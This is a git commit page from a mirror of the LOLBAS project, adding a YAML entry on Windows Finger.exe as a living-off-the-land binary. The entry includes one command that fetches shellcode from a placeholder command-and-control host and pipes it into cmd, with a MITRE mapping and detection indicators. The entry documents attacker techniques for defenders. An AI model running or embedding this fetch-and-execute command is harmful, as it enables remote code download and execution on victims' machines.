mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Create Finger.exe
This commit is contained in:
parent
f51a70c03e
commit
670a5f1870
28
yml/OSBinaries/Finger.yml
Normal file
28
yml/OSBinaries/Finger.yml
Normal file
@ -0,0 +1,28 @@
|
||||
Name: Finger.exe
|
||||
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
|
||||
Author: Ruben Revuelta
|
||||
Created: 2021-08-30
|
||||
Commands:
|
||||
- Command: finger user@example.host.com | more +2 | cmd
|
||||
Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process.
|
||||
Usecase: Download malicious shellcode from Command & Control server.
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/techniques/T1105
|
||||
OperatingSystem: From Windows Server 2008 and Windows 8
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\finger.exe
|
||||
- Path: c:\windows\syswow64\finger.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finger.exe spawn is not common in client systems.
|
||||
- IOC: finger.exe connecting to external resources.
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
|
||||
Acknowledgement:
|
||||
- Person: Ruben Revuelta (MAPFRE CERT)
|
||||
Handle: @rubn_RB
|
||||
- Person: Jose A. Jimenez (MAPFRE CERT)
|
||||
Handle: @Ocelotty6669
|
Loading…
Reference in New Issue
Block a user